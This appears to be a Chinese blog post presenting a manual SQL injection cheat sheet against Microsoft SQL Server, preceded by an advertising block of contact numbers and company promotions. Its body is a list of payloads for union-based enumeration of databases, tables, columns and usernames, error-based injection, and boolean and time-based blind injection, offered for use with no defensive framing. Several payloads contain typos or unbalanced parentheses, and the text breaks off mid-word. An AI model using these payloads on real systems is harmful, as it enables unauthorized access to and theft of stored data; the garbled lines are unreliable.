渗透测试——sql手工注入实战 @SQL server

约定不等于承诺〃 2021-07-25 17:50 628阅读 0赞

![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzMzNjA4MDAw_size_16_color_FFFFFF_t_70]

--------------------

QQ 1274510382  
Wechat JNZ\_aming  
商业联盟 QQ群538250800  
技术搞事 QQ群599020441  
解决方案 QQ群152889761  
加入我们 QQ群649347320  
共享学习 QQ群674240731  
纪年科技aming  
网络安全 ,深度学习,嵌入式,机器强化,生物智能,生命科学。

叮叮叮：产品已上线 —>关注 官方-微信公众号——济南纪年信息科技有限公司  
民生项目：商城加盟/娱乐交友/创业商圈/外包兼职开发-项目发布/  
安全项目：态势感知防御系统/内网巡查系统  
云服项目：动态扩容云主机/域名/弹性存储-数据库-云盘/API-AIeverthing  
产品咨询/服务售后（同）

## 纸上得来终觉浅,绝知此事要躬行 ！！！   寻找志同道合伙伴创业中。。。抱团滴滴aming联系方式！! ##

--------------------

#### \#本文为广告系统自动投放广告 ####

#### \# 如有侵权 删改 请速速联系我们 ####

--------------------

### 0x01 联合注入 ###

?id=-1' union select null,null--
    ?id=-1' union select @@servername, @@version--
    ?id=-1' union select db_name(),suser_sname()--
    ?id=-1' union select (select top 1 name from sys.databases where name not in (select top 6 name from sys.databases)),null--
    ?id=-1' union select (select top 1 name from sys.databases where name not in (select top 7 name from sys.databasesl),null--
    ?id--1' union select (select top 1 table_ name from information_schema.tables where table_name not in (select top 0 table_name from information_schema.tables)),null--
    ?id=-1' union select (select top 1 column name from information_schema.columns where table_name='users' and column_name not in (select top 1 column_name from information_schema.columns where table_name = 'users')),null---
    ?id=-1' union select (select top 1 username from users where username not in (select top 3 username from users)),null--

### 0x02 报错注入 ###

?id=1' and 1=(select 1/@@servername)--
    ?id=1' and 1=(select 1/(select top 1 name from sys.databases where name not in (select top 1 name from sys.databases))--

### 0x03 盲注 ###

1 布尔盲注

?id=1' and ascii(substring((select db_ name(1)),1,1))> 64--

2 时间盲注

?id= 1';if(2>1) waitfor delay '0:0:5'--
    ?id= 1';if(ASCII(SUBSTRING((select db_name(1)),1,1))> 64) wai

[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzMzNjA4MDAw_size_16_color_FFFFFF_t_70]: /images/20210725/c167ed52efe1418990fd0a6dfaa34fa7.png